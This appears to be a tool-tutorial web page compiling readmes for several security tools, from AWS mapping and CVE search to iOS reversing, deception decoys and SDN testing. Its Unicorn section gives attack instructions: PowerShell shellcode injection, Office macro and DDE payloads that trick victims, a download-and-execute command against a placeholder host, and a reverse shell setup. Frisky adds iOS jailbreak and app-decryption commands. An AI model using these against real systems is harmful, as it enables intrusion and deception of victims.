Kali Linux Tutorials

Cloudmapper – Tool Helps To Analyze Your AWS Environments

CloudMapper helps you analyze your Amazon Web Services (AWS) environments. The original purpose was to generate network diagrams and display them in your browser. It now contains more functionality. Click here for the demo.

Also Read Frisky – Tools To Assist Binary App Reversing & Augmentation

Installation

Requirements:

pip and virtualenv
You will also need jq and the library pyjq, which require some additional tools installed that will be shown.

On macOS:

# clone the repo
git clone git@github.com:duo-labs/cloudmapper.git
# Install pre-reqs for pyjq
brew install autoconf automake libtool jq awscli python3
cd cloudmapper/
python3 -m venv ./venv
source venv/bin/activate
pip install -r requirements.txt

On Linux:

# clone the repo
git clone git@github.com:duo-labs/cloudmapper.git
# (Centos, Fedora, RedHat etc.):
# sudo yum install autoconf automake libtool python34-devel jq awscli
# (Debian, Ubuntu etc.):
# You may additionally need "build-essential"
sudo apt-get install autoconf automake libtool python3-dev jq awscli
cd cloudmapper/
python3 -m venv ./venv
source venv/bin/activate
pip install -r requirements.txt

Setup Cloudmapper

1. Configure your account

Edit config file manually

Copy the config.json.demo to config.json and edit it to include your account ID and name (ex. “prod”), along with any external CIDR names. A CIDR is an IP range such as 1.2.3.4/32 which means only the IP 1.2.3.4.

Generate config file

CloudMapper has commands to configure your account:

python cloudmapper.py configure {add-account|remove-account} --config-file CONFIG_FILE --name NAME --id ID [--default DEFAULT]
python cloudmapper.py configure {add-cidr|remove-cidr} --config-file CONFIG_FILE --cidr CIDR --name NAME

This will allow you to define the different AWS accounts you use in your environment and the known CIDR IPs.

2. Collect data about the account

This step uses the CLI to make describe and list calls and records the json in the folder specified by the account name under account-data.

Locally, AWS CLI must be configured with proper access key and region information. Generate new access keys in AWS Console and input the generated keys to aws configure if you have not done so yet.

You must have AWS credentials configured that can be used by the CLI with read permissions for the different metadata to collect. If you plan to use all the features of CloudMapper, grant the SecurityAudit policy. If you only plan to use the network visualization, this can be reduced to an even more minimal set of permissions:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Resource": "*",
      "Action": [
        "ec2:DescribeRegions",
        "ec2:DescribeAvailabilityZones",
        "ec2:DescribeVpcs",
        "ec2:DescribeSubnets",
        "ec2:DescribeSecurityGroups",
        "ec2:DescribeVpcPeeringConnections",
        "ec2:DescribeInstances",
        "ec2:DescribeNetworkInterfaces",
        "rds:DescribeDBInstances",
        "elasticloadbalancing:DescribeLoadBalancers"
      ]
    }
  ]
}

Collecting the data can be performed with a bash script or via the python code base. Both options support a --profile to specify the AWS account profile to use.

Bash script

Using the script is helpful if you need someone else to get this data for you without fiddling with setting up the python environment.

NOTE : The script will collect a small subset of available data. It is preferable to use Option 2 below whenever possible.

./collect_data.sh --account my_account

my_account is just a name for your account (ex. “prod”). You can also pass a --profile option if you have multiple AWS profiles configured. You should now have a directory with .json files describing your account in a directory named after account name.

Python code

python cloudmapper.py collect --account my_account

CVE-Search : A Tool To Perform Local Searches For Known Vulnerabilities

CVE-Search is a tool to import CVE (Common Vulnerabilities and Exposures) and CPE (Common Platform Enumeration) into a MongoDB to facilitate search and processing of CVEs.

The main objective of the software is to avoid doing direct and public lookups into the public CVE databases. Local lookups are usually faster and you can limit your sensitive queries via the Internet.

CVE-Search includes a back-end to store vulnerabilities and related information, an intuitive web interface for search and managing vulnerabilities, a series of tools to query the system and a web API interface.

Installation of MongoDB

First, you’ll need to have a Python 3 installation (3.3 or higher). Then you need to install MongoDB (2.2) from source (this should also work with any standard packages from your favorite distribution). Don’t forget to install the headers for development while installing MongoDB. You can go to http://docs.mongodb.org/manual/installation/ for to get the packages for your distribution, or http://www.mongodb.org/downloads for the source code.

Also Read Armory – Tool To Take Lot Of External & Discovery Data

Populating The Database

For the initial run, you need to populate the CVE database by running:

./sbin/db_mgmt.py -p
./sbin/db_mgmt_cpe_dictionary.py
./sbin/db_updater.py -c

It will fetch all the existing XML files from the Common Vulnerabilities and Exposures database and the Common Platform Enumeration. The initial Common Platform Enumeration (CPE) import might take some time depending of your configuration.

If you want to add the cross-references from NIST, Red Hat and other vendors:

./sbin/db_mgmt_ref.py

Updating The Ddatabase

An updater script helps to start the db_mgmt_*

./sbin/db_updater.py -v

You can run it in a crontab, logging is done in syslog by default.

Repopulating The Database

To easily drop and re-populate all the databases

./sbin/db_updater.py -v -f

This will drop all the existing external sources and reimport everything. This operation can take some time and it’s usually only required when new attributes parsing are added in cve-search.

Usage

You can search the database using search.py

./bin/search.py -p cisco:ios:12.4
./bin/search.py -p cisco:ios:12.4 -o json
./bin/search.py -f nagios -n
./bin/search.py -p microsoft:windows_7 -o html

If you want to search all the WebEx vulnerabilities and only printing the official references from the supplier.

./bin/search.py -p webex: -o csv  -v "cisco"

You can also dump the JSON for a specific CVE ID.

./bin/search.py -c CVE-2010-3333

Or you can use the XMPP bot

./bin/search_xmpp.py -j mybot@jabber.org -p strongpassword

Or dump the last 2 CVE entries in RSS or Atom format

./bin/dump_last.py -f atom -l 2

Or you can use the webinterface.

./web/index.py

Usage Of The Ranking Database

There is a ranking database allowing to rank software vulnerabilities based on their common platform enumeration name. The ranking can be done per organization or department within your organization or any meaningful name for you.

As an example, you can add a partial CPE name like “sap:netweaver” which is very critical for your accounting department.

./sbin/db_ranking.py  -c "sap:netweaver" -g "accounting" -r 3

and then you can lookup the ranking (-r option) for a specific CVE-ID:

./bin/search.py -c CVE-2012-4341  -r  -n

Advanced Usage

As cve-search is based on a set of tools, it can be used and combined with standard Unix tools. If you ever wonder what are the top vendors using the term “unknown” for their vulnerabilities:

python3 bin/search_fulltext.py -q unknown -f | jq -c '. | .vulnerable_configuration[0]' | cut -f5 -d: | sort  | uniq -c  | sort -nr | head -10

1500 oracle
381 sun
372 hp
232 google
208 ibm
126 mozilla
103 microsoft
100 adobe
 78 apple
 68 linux

You can compare CVSS (Common Vulnerability Scoring System ) values of some products based on their CPE name. Like comparing oracle:java versus sun:jre and using R to make some statistics about their CVSS values:

python3 bin/search.py -p oracle:java -o json  | jq -r '.cvss' | Rscript -e 'summary(as.numeric(read.table(file("stdin"))[,1]))'
Min. 1st Qu.  Median    Mean 3rd Qu.    Max.
1.800   5.350   9.300   7.832  10.000  10.000


python3 bin/search.py -p sun:jre -o json  | jq -r '.cvss' | Rscript -e 'summary(as.numeric(read.table(file("stdin"))[,1]))'
Min. 1st Qu.  Median    Mean 3rd Qu.    Max.
0.000   5.000   7.500   7.333  10.000  10.000

Fulltext indexing

If you want to index all the CVEs from your current MongoDB collection:

./sbin/db_fulltext.py

and you query the fulltext index (to get a list of matching CVE-ID):

./bin/search_fulltext.py -q NFS -q Linux

or to query the fulltext index and output the JSON object for each CVE-ID:

./bin/search_fulltext.py -q NFS -q Linux -f

Fulltext Visualization

The fulltext indexer visualization is using the fulltext indexes to build a list of the most common keywords used in CVE. NLTK is required to generate the keywords with the most common English stopwords and lemmatize the output. NTLK for Python 3 exists but you need to use the alpha version of NLTK.

./bin/search_fulltext.py  -g -s >cve.json

Web interface CVE-Search

The web interface is a minimal interface to see the last CVE entries and query a specific CVE. You’ll need flask in order to run the website and Flask-PyMongo. To start the web interface:

cd ./web
./index.py

Then you can connect on http://127.0.0.1:5000/ to browser the last CVE.

Web API interface

The web interface includes a minimal JSON API to get CVE by ID, by vendor or product. A public version of the API is also accessible on cve.circl.lu.

List the know vendors in JSON

curl http://127.0.0.1:5000/api/browse/

Dump the product of a specific vendor in JSON

curl  http://127.0.0.1:5000/api/browse/zyxel 
{
  "product": [
    "n300_netusb_nbg-419n",
    "n300_netusb_nbg-419n_firmware",
    "p-660h-61",
    "p-660h-63",
    "p-660h-67",
    "p-660h-d1",
    "p-660h-d3",
    "p-660h-t1",
    "p-660h-t3",
    "p-660hw",
    "p-660hw_d1",
    "p-660hw_d3",
    "p-660hw_t3"
  ],
  "vendor": "zyxel"
}

Find the associated vulnerabilities to a vendor and a product

curl  http://127.0.0.1:5000/api/search/zyxel/p-660hw
[{"cwe": "CWE-352", "references": ["http://www.exploit-db.com/exploits/33518", "http://secunia.com/advisories/58513", "h

Software using cve-search

cve-portal which is a CVE notification portal
cve-search-mt which is a set of management tools for CVE-Search
cve-scan which is a NMap CVE system scanner

Armory – Tool To Take Lot Of External & Discovery Data

Armory is a tool meant to take in a lot of external and discovery data from a lot of tools, add it to a database and correlate all of related information. It isn’t meant to replace any specific tool. It is meant to take the output from various tools, and use it to feed other tools.

Additionally, it is meant to be easily extendable. Don’t see a module for your favorite tool? Write one up! Want to export data in just the right format for your reporting? Create a new report!

Also Read Delta – SDN Security Evaluation & Penetration Testing Framework

Installing Armory

Clone the repo:

git clone https://github.com/depthsecurity/armory

Install the dependencies:

pip install -r requirements

Now set up the configuration:

cd config
copy settings.ini.sample settings.ini

Next edit settings.ini and modify the base_path option. This should point to the root path you are using for your current project. You should change this with every project, so you will always be using a clean database. All files generated by modules will be created in here, as well as the sqlite3 database.

Usage of Armory

Usage is split into modules and reports.

Modules

Modules run tools, ingest output, and write it to the database. To see a list of available modules, type:

./armory.py -lm

To see a list of module options, type:

./armory.py -m <module> -M

Reports

Reports are similar to modules, except they are meant to pull data from the database, and display it in a usable format. To view all of the available reports:

./armory.py -lr

To view available report options:

./armory.py -r <report> -R

Rootless Jailbreakd – Jailbreakd Offering Some More Functionality To The Jailbreak

Rootless Jailbreakd is A small jailbreakd offering some more functionality to the jailbreak. Uses CPDisctributedMessageCenter. To compile you need theos (why? cus why not? and I like theos. If you’re smart enough you can still compile it manually very easily so yeah)

Also Read whatweb – Tool to Discover Security Vulnerabilities With Your Web Application

Setup Rootless Jailbreakd

Grab AppSupport headers and add them into your include path (https://github.com/theos/headers/tree/05405174749d912f7726121fcb5f27de73af0f08/AppSupport)
Include “AppSupport/CPDistributedMessagingCenter.h” on your main.m file
Link with https://github.com/jakeajames/rootme-tutorial/blob/master/AppSupport.tbd

The general syntax follows as this:

CPDistributedMessagingCenter *messageCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.rootme"];
[messageCenter sendMessageAndReceiveReplyName:@"MESSAGE_NAME" userInfo:[NSDictionary dictionaryWithObject:[NSString stringWithFormat:@"%d", getpid()] forKey:@"pid"]];

Compiling

./make.sh

Commands

At the moment these commands are available

“rootme”: does setuid(0) and setgid(0) for you
“unsandbox”: gets rid of most of the sandbox (This will not be any useful right now since to call jailbreakd you have to be unsandboxed already)
“platformize”: marks your binary as platform by setting TF_PLATFORM and CS_PLATFORM_BINARY
“setcsflags”: Sets some flags such as CS_PLATFORM_BINARY, CS_GET_TASK_ALLOW, CS_DEBUGGED etc
“entitle”: Set entitlement to true or false. Example:

CPDistributedMessagingCenter *messageCenter = [CPDistributedMessagingCenter centerNamed:@"com.jakeashacks.rootme"];
NSMutableDictionary *dict = [NSMutableDictionary dictionary];
[dict setValue:@"com.apple.private.skip-library.validation" forKey:@"ent"]; //entitlement name
[dict setValue:@"true" forKey:@"value"]; //true or false
[dict setValue:[NSString stringWithFormat:@"%d", getpid()] forKey:@"pid"];
[messageCenter sendMessageAndReceiveReplyName:@"entitle" userInfo:dict];

Do binaries need suid permissions or root ownership?

No. I didn’t bother with that because

There isn’t a package manager so all binaries are controlled by you,
there’s no root remount thus nothing can cause a big mess,
you need to be unsandboxed to make a call to jailbreakd (all binaries you run via SSH satisfy this requirement) and that’s enough for me. Is it coming? Probably yes

Frisky – Tools To Assist Binary App Reversing & Augmentation

Frisky is an instruments to assist in binary application reversing and augmentation, geared towards walled gardens like iOS. Most, if not all, recently tested on iOS 11.1.2 and macOS 10.12.6.

frida-url-interceptor.js(Frisky)

Intercepts all URLs of an iOS/macOS application, allowing you to trace and alter/intercept all network traffic, including https, per app before encryption and after decryption:

iOS: open app of interest first, e.g. Safari
macOS: frida -U -n Safari -l frida-url-interceptor.js
It will also display a popup window upon the first request in the iOS app to confirm code interception

Also Read Dejavu – Open Source Deception Framework

ldid / ldid2

When building recent iOS jailbreaks dependent on SHA256 signatures, ldid2 is required. This repo will allow you to easily compile ldid and ldid2 for signing and modifying an iOS binary’s entitlements, and thus jailbreaking a device.

macOS: ldid{2} -e MobileSafari # to dump MobileSafari’s entitlements
macOS: ldid{2} -S cat # to sign cat

Extract shared libraries used by apps not directly available on iOS filesystem for static analysis:

Grab the patched dyld-210.2.3-patched (included in this repo) and run the custom dsc_extractor (you may need to compile from the xcodeproject) to dump iOS’ /System/Library/Caches/com.apple.dyld/dyld_shared_cache_arm* into individual dylibs:
macOS: mkdir -p dylibs && dyld-210.2.3-patched/launch-cache/dsc_extractor /path/to/copied/dyld_shared_cache_arm* dylibs

Discover and modify library/framekwork function call arguments and return codes via Frida:

iOS: open app of interest first, e.g. Twitter
macOS: frida-trace -U -i "*tls*" Twitter # hook all calls matching /tls/i for the Twitter app
macOS: Now __handlers__/libcoretls.dylib/tls_private_key_create.js will be generated:
- onEnter‘s args[2] is first argument to the function
  - Extract string from first argument: Memory.readUtf8String(args[2]) or ObjC.Object(args[2]))
- onLeave‘s retval is the return value
  - Print out retval: log(retval.toInt32())
  - Adjust retval: retval.replace(0)

Sniff network traffic from (non-jailbroken/jailbroken) iOS device from your mac:

macOS: system_profiler SPUSBDataType|perl -n0e'`rvictl -s $1`if/iP(?:hone|ad):.*?Serial Number: (\S+)/s';sudo tcpdump -i rvi0
standard tcpdump options/filters apply

Decrypt IPA (iOS apps)/Frameworks for static analysis via dumpdecrypted.dylib:

iOS: su mobile && mkdir -p ~/tmp && cd ~/tmp && DYLD_INSERT_LIBRARIES=/usr/lib/dumpdecrypted.dylib /var/containers/Bundle/Application/*/AppName.app/AppName

View system logs on iOS live using deviceconsole:

macOS: deviceconsole
macOS: unbuffer deviceconsole | grep something # keeps pretty colors- requiresexpect, can be installed viasudo port install expectorbrew install expect`

Electra: allow jailbroken Tweaks to appear in Settings:

iOS: mv /Library/TweakInject /Library/TweakInject.bak && ln -s /Library/MobileSubstrate/DynamicLibraries /Library/TweakInject && killall -HUP SpringBoard

Dejavu – Open Source Deception Framework

DejaVU is a open source deception framework. Deception techniques if deployed well can be very effective for organizations to improve network defense and can be a useful arsenal for blue teams to detect attacks at very early stage of cyber kill chain. But the challenge we have seen is deploying, managing and administering decoys across large networks is still not easy and becomes complex for defenders to manage this over time. Although there are a lot of commercial tools in this space, we haven’t come across open source tools which can achieve this. Credits to Bhadresh Patel and Harish Ramadoss.

Video demo for tool is published here

Also Read Delta – SDN Security Evaluation & Penetration Testing Framework

DejaVU Usage Guide

Initial Setup

Quick setup video guide – https://youtu.be/NOuEGa0241U
Command-line interface credentials – administrator:changepassword

Add Server Decoy

To add a decoy, we first need to add a VLAN on which we want to later deploy Decoys.
- Select Decoy Management -> Add VLAN
- Enter the VLAN ID. Use the “List Available VLANs” option to list the VLANs tagged on the interface.

To add server decoy :
- Select Decoy Management ->Add Server Decoy
- Provide the details for new decoy as shown below. Select the services (SMB/FTP/MySQL/FTP/Web Server/SSH) to be deployed, use dynamic or provide a static IP address.

Let’s do some port scan’s + Auth attempts from attacker machine on server VLAN and analyze the alerts.

View the alerts triggered when the attacker scanned our decoy and tried to authenticate.
- Select Log Management -> List Events

Add Client Decoy

To add Client Decoy
- Select Decoy Management ->Add Client Decoy
- Provide the details for new decoy as shown below. It’s recommended to place the client decoy on user VLANs to detect responder/LLMNR attacks.

Let’s run responder from attacker machine on end user VLAN and analyze the alerts.

View the alerts triggered when the attacker scanned our decoy and tried to authenticated.
- Log management -> List Events

Filter Alerts

Alerts can be configured based on various parameters. Example – Don’t send alerts from IP – 10.1.10.101. If certain IP’s like in-house vulnerability scanner, SCCM etc. needs to be whitelisted.

Delta – SDN Security Evaluation & Penetration Testing Framework

DELTA is a penetration testing framework that regenerates known attack scenarios for diverse test cases. This framework also provides the capability of discovering unknown security problems in SDN by employing a fuzzing technique.

Agent-Manager is the control tower. It takes full control over all the agents deployed to the target SDN network.
Application-Agent is a legitimate SDN application that conducts attack procedures and is controller-dependent. The known malicious functions are implemented as application-agent functions.
Channel-Agent is deployed between the controller and the OpenFlow-enabled switch. The agent sniffs and modifies the unencrypted control messages. It is controller-independent.
Host-Agent behaves as if it was a legitimate host participating in the target SDN network. The agent demonstrates an attack in which a host attempts to compromise the control plane.

Also Read whatweb – Tool to Discover Security Vulnerabilities With Your Web Application

Installing DELTA

Its installation depends on maven and ant build system. The mvn command is used to install the agent-manager and the agents. It can support an All-In-One Single Machine environment via containers as well as a real hardware SDN environment.

STEP 1. Get the source code of DELTA on the agent manager machine

$ git clone https://github.com/OpenNetworkingFoundation/DELTA.git

STEP 2. Install DELTA dependencies

$ cd <DELTA>/tools/dev/delta-setup/
$ ./delta-setup-devenv-ubuntu

STEP 3. Install three containers using lxc

$ source ./<DELTA>/tools/dev/delta-setup/bash_profile
$ cd <DELTA>/tools/dev/lxc-setup
$ ./lxc-create

$ sudo vi /etc/default/lxc-net
Uncomment "LXC_DHCP_CONFILE=/etc/lxc/dnsmasq.conf"
$ sudo service lxc-net restart
$ sudo lxc-start -n container-cp -d

$ sudo vi /etc/apparmor.d/abstractions/lxc/container-base
Uncomment "mount options=(rw, make-rprivate) -> **,"
$ sudo apparmor_parser -r /etc/apparmor.d/lxc-containers

$ cd ~
$ ssh-keygen -t rsa
(Press Enter)
$ ssh-copy-id -i ~/.ssh/id_rsa.pub $DELTA_CP
(ID: ubuntu, PW: ubuntu)

$ ssh $DELTA_CP
(DELTA_CP) $ sudo visudo
In the bottom of the file, type the follow:
ubuntu ALL=(ALL) NOPASSWD: ALL
(DELTA_CP) $ exit

$ cd <DELTA>/tools/dev/lxc-setup
$ ./lxc-setup
$ ssh-copy-id -i ~/.ssh/id_rsa.pub $DELTA_CH
$ ssh-copy-id -i ~/.ssh/id_rsa.pub $DELTA_DP

In the case of all-in-one single machine, the test environment is automatically setup as below:

Running DELTA

STEP 1. Distribute the executable files to Containers

$ cd <DELTA>
$ source ./tools/dev/delta-setup/bash_profile
$ ./tools/dev/delta-setup/delta-agents-scp

STEP 2. Execute Agent-Manager first

$ cd <DELTA>
$ bin/run-delta tools/config/<configuration file> # e.g., manager_vm.cfg

 DELTA: A Penetration Testing Framework for Software-Defined Networks

 [pP]	- Show all known attacks
 [cC]	- Show configuration info
 [kK]	- Replaying known attack(s)
 [uU]	- Finding an unknown attack
 [qQ]	- Quit

Command>_

STEP 3. Connect Web-based UI (port number is 7070)

Main Contributors

Seungsoo Lee (KAIST)
Jinwoo Kim (KAIST)
Seungwon Woo (KAIST)
Changhoon Yoon (KAIST)
Sandra Scott-Hayward (Queen’s University Belfast)
Seungwon Shin (KAIST)

Unicorn – Downgrade Attack & Inject Shellcode Straight into Memory

A unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber’s PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.

Usage is simple, just run Magic Unicorn (ensure Metasploit is installed if using Metasploit methods and in the right path) and the magic unicorn will automatically generate a PowerShell command that you need to simply cut and paste the Powershell code into a command line window or through a payload delivery system. Unicorn supports your own shellcode, cobalt strike, and Metasploit.

Also Read Onion nmap To Scan Hidden Onion Services

POWERSHELL ATTACK INSTRUCTIONS

Everything is now generated in two files, powershell_attack.txt and unicorn.rc. The text file contains all of the code needed in order to inject the PowerShell attack into memory. Note you will need a place that supports remote command injection of some sort. Often times this could be through an excel/word doc or through psexec_commands inside of Metasploit, SQLi, etc..

There are so many implications and scenarios to where you can use this attack at. Simply paste the powershell_attack.txt command in any command prompt window or where you have the ability to call the PowerShell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads. When using the download and exec, simply put python unicorn.py windows/download_exec url=https://www.thisisnotarealsite.com/payload.exe and the PowerShell code will download the payload and execute.

Note: You will need to have a listener enabled in order to capture the attack.

MACRO ATTACK INSTRUCTIONS

For the macro attack, you will need to go to File, Properties, Ribbons, and select Developer. Once you do that, you will have a developer tab. Create a new macro, call it Auto_Open and paste the generated code into that. This will automatically run.

Note that a message will prompt to the user saying that the file is corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR! This is tricking the victim into thinking the excel document is corrupted. You should get a shell through PowerShell injection after that.

If you are deploying this against Office365/2016+ versions of Word you need to modify the first line of the output from Sub Auto_Open()

To: Sub AutoOpen()

The name of the macro itself must also be “AutoOpen” instead of the legacy “Auto_Open” naming scheme.

NOTE: When copying and pasting the excel, if there are additional spaces that are added you need to remove these after each of the PowerShell code sections under variable “x” or a syntax error will happen!

HTA ATTACK INSTRUCTIONS

The HTA attack will automatically generate two files, the first the index.html which tells the browser to use Launcher.hta which contains the malicious PowerShell injection code. All files are exported to the hta_access/ folder and there will be three main files. The first is index.html, second Launcher.hta and the last, the unicorn.rc file. You can run msfconsole -r unicorn.rc to launch the listener for Metasploit.

A user must click allow and accept when using the HTA attack in order for the PowerShell injection to work properly.

CERUTIL Attack Instruction

The certutil attack vector was identified by Matthew Graeber which allows you to take a binary file, move it into a base64 format and use certutil on the victim machine to convert it back to a binary for you. This should work on virtually any system and allow you to transfer a binary to the victim machine through a fake certificate file. To use this attack, simply place an executable in the path of the unicorn and run python unicorn.py <exe_name> crt in order to get the base64 output. Once that’s finished, go to decode_attack/ folder which contains the files. The bat file is a command that can be run in a windows machine to convert it back to a binary.

Custom PS1 Attack Instructions

This attack method allows you to convert any PowerShell file (.ps1) into an encoded command or macro.

Note: If choosing the macro option, a large ps1 file may exceed the amount of carriage returns allowed by VBA. You may change the number of characters in each VBA string by passing an integer as a parameter.

Examples:

python unicorn.py harmless.ps1 python unicorn.py myfile.ps1 macro python unicorn.py muahahaha.ps1 macro 500

The last one will use a 500 character string instead of the default 380, resulting in less carriage returns in VBA.

DDE Office COM Attack Instructions

This attack vector will generate the DDEAUTO formulate to place into Word or Excel. The COM object DDEInitilize and DDEExecute allow for formulas to be created directly within Office which causes the ability to gain remote code execution without the need of macros. This attack was documented and full instructions can be found at:

https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

In order to use this attack, run the following examples:

python unicorn.py dde python unicorn.py windows/meterpreter/reverse_https 192.168.5.5 443 dde

Once generated, a powershell_attack.txt will be generated which contains the Office code, and the unicorn.rc file which is the listener component which can be called by msfconsole -r unicorn.rc to handle the listener for the payload. In addition, a download.ps1 will be exported as well (explained in the latter section).

In order to apply the payload, as an example:

Open Word
Insert tab -> Quick Parts -> Field
Choose = (Formula) and click ok.
Once the field is inserted, you should now see “!Unexpected End of Formula”
Right-click the Field, choose “Toggle Field Codes”
Paste in the code from Unicorn
Save the Word document.

Once the office document is opened, you should receive a shell through PowerShell injection. Note that DDE is limited on char size and we need to use Invoke-Expression (IEX) as the method to download.

The DDE attack will attempt to download download.ps1 which is our PowerShell injection attack since we are limited to size restrictions. You will need to move the download.ps1 to a location that is accessible by the victim machine. This means that you need to host the download.ps1 in an Apache2 directory that it has access to.

You may notice that some of the commands use “{ QUOTE” these are ways of masking specific commands which is documented here.

In this case, we are changing WindowsPowerShell, powershell.exe, and IEX to avoid detection. Also, check out the URL as it has some great methods for not calling DDE at all.

Import Cobalt Strike Beacon

This method will import direct Cobalt Strike Beacon shellcode directly from Cobalt Strike. Within Cobalt Strike, export the Cobalt Strike “CS” (C#) export and save it to a file. For example, call the file, cobalt_strike_file.cs.

The export code will look something like this:

length: 836 bytes */ byte[] buf = new byte[836] { 0xfc, etc

Next, for usage:

python unicorn.py cobalt_strike_file.cs cs

The cs argument tells Unicorn that you want to use the Cobalt strike functionality. The rest is Magic. Next simply copy the PowerShell command to something you have the ability for remote command execution.

NOTE: The file must be exported in the c# (cs) format within cobalt strike to parse properly.

There are some caveats with this attack. Note that the payload size will be a little over 14k+ in byte size. That means that from a command line argument perspective if you copy and paste you will hit the 8191 character size restriction (hardcoded into cmd.exe). If you are launching directly from cmd.exe this is an issue, however, if you are launching directly from PowerShell or other normal applications this is a non-problem.

A couple examples here, wscript.shell and PowerShell use USHORT – 65535 / 2 = 32767 size limit:

typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING;

For this attack, if you are launching directly from PowerShell, VBScript (WSCRIPT.SHELL), there is no issues.

Custom Shellcode Generation Method

This method will allow you to insert your own shellcode into the Unicorn attack. The PowerShell code will increase the stack side of the powershell.exe (through VirtualAlloc) and inject it into memory.

Note that in order for this to work, the txt file that you point Unicorn to must be formatted in the following format or it will not work:

0x00,0x00,0x00 and so on.

Also, note that there are size restrictions. The total length size of the PowerShell command cannot exceed the size of 8191. This is the max command line argument size limit in Windows.

Usage:

python uniocrn.py shellcode_formatted_properly.txt shellcode

Next simply copy the PowerShell command to something you have the ability for remote command execution.

NOTE: The file must properly be formatted in a 0x00,0x00,0x00 type format with nothing else other than your shellcode in the txt file.

There are some caveats with this attack. Note that if your payload size is large in nature it will not fit in cmd.exe. That means that from a command line argument perspective if you copy and paste you will hit the 8191 character size restriction (hardcoded into cmd.exe). If you are launching directly from cmd.exe this is an issue, however, if you are launching directly from PowerShell or other normal applications this is a non-problem.

A couple examples here, wscript.shell and PowerShell use USHORT – 65535 / 2 = 32767 size limit:

typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING;

For this attack, if you are launching directly from PowerShell, VBSCript (WSCRIPT.SHELL), there is no issues.

Onion nmap To Scan Hidden Onion Services

Utilize nmap to scan hidden “onion” benefits on the Tor network. Insignificant picture in view of elevated, utilizing proxychains to wrap nmap. Tor and dnsmasq are keep running as daemons by means of s6, and proxychains wraps nmap to utilize the Tor SOCKS intermediary on port 9050.

Tor is likewise designed through DNSPort to secretly resolve DNS solicitations to port 9053. dnsmasq is arranged to with this localhost:9053 as an expert DNS server. Proxychains is arranged to intermediary DNS through the nearby resolver, so all DNS solicitations will experience Tor and applications can resolve .onion addresses.

Also Read CloudFrunt Tool For Identifying Misconfigured CloudFront Domains

How Onion nmap works:

When the container boots, it launches Tor and dnsmasq as daemons. The tor_wait script then waits for the Tor SOCKS proxy to be up before executing your command.

Arguments:

By default, args to docker run are passed to /bin/nmap which calls nmap with args -sT -PN -n "$@" necessary for it to work over Tor (via explainshell.com).

For example, this:

docker run --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion

will be executed as:

proxychains4 -f /etc/proxychains.conf /usr/bin/nmap -sT -PN -n -p 80,443 facebookcorewwwi.onion

In addition to the custom script for nmap, custom wrapper scripts for curl and nc exist to wrap them in proxychains, at /bin/curl and /bin/nc. To call them, simply specify curl or nc as the first argument to docker run. For example:

docker run --rm -it milesrichardson/onion-nmap nc -z 80 facebookcorewwwi.onion

will be executed as:

proxychains4 -f /etc/proxychains.conf /usr/bin/nc -z 80 facebookcorewwwi.onion

and

docker run --rm -it milesrichardson/onion-nmap curl -I https://facebookcorewwwi.onion

will be executed as:

proxychains4 -f /etc/proxychains.conf /usr/bin/curl -I https://facebookcorewwwi.onion

If you want to call any other command, including the original /usr/bin/nmap or /usr/bin/nc or /usr/bin/curl you can specify it as the first argument to docker run, e.g.:

docker run --rm -it milesrichardson/onion-nmap /usr/bin/curl -x socks4h://localhost:9050 https://facebookcorewwwi.onion

Environment variables:

There is only one environment variable: DEBUG_LEVEL. If you set it to anything other than 0, more debugging info will be printed (specifically, the attempted to connections to Tor while waiting for it to boot). Example:

$ docker run -e DEBUG_LEVEL=1 --rm -it milesrichardson/onion-nmap -p 80,443 facebookcorewwwi.onion
[tor_wait] Wait for Tor to boot... (might take a while)
[tor_wait retry 0] Check socket is open on localhost:9050...
[tor_wait retry 0] Socket OPEN on localhost:9050
[tor_wait retry 0] Check SOCKS proxy is up on localhost:9050 (timeout 2 )...
[tor_wait retry 0] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 1] Check socket is open on localhost:9050...
[tor_wait retry 1] Socket OPEN on localhost:9050
[tor_wait retry 1] Check SOCKS proxy is up on localhost:9050 (timeout 4 )...
[tor_wait retry 1] SOCKS proxy DOWN on localhost:9050, try again...
[tor_wait retry 2] Check socket is open on localhost:9050...
[tor_wait retry 2] Socket OPEN on localhost:9050
[tor_wait retry 2] Check SOCKS proxy is up on localhost:9050 (timeout 6 )...
[tor_wait retry 2] SOCKS proxy UP on localhost:9050
[tor_wait] Done. Tor booted.
[nmap onion] nmap -p 80,443 facebookcorewwwi.onion
[proxychains] config file found: /etc/proxychains.conf
[proxychains] preloading /usr/lib/libproxychains4.so
[proxychains] DLL init: proxychains-ng 4.12

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-23 16:34 UTC
[proxychains] Dynamic chain  ...  127.0.0.1:9050  ...  facebookcorewwwi.onion:443  ...  OK
[proxychains] Dynamic chain  ...  127.0.0.1:9050  ...  facebookcorewwwi.onion:80  ...  OK
Nmap scan report for facebookcorewwwi.onion (224.0.0.1)
Host is up (2.8s latency).

PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 4.05 seconds

Notes:

No UDP available over Tor
Tor can take 10-20 seconds to boot. If this is untenable, another option is to run the proxy in its own container, or run it as the main process and then run “exec” to call commands like nmap

WarBerryPi – A Collection Of Scanning Tools For Tactical Exploitation

WarBerryPi was built to be used as a hardware implant during red teaming scenarios where we want to obtain as much information as possible in a short period of time with being as stealth as possible. Just find a network port and plug it in. The scripts have been designed in a way that the approach is targeted to avoid noise in the network that could lead to detection and to be as efficient as possible. The WarBerry script is a collection of scanning tools put together to provide that functionality.

Also Read Hawkeye – A Tool To Crawl The Filesystem Or A Directory

WarBerryPi Usage

To get a list of all options and switches use:

python warberry.py -h


Options:

  --version                             show program's version number and exit
  -h, --help                            show this help message and exit
  -p PACKETS, --packets=PACKETS         Number of Network Packets to capture
  -I IFACE, --interface=IFACE           Network Interface to use. Default: eth0
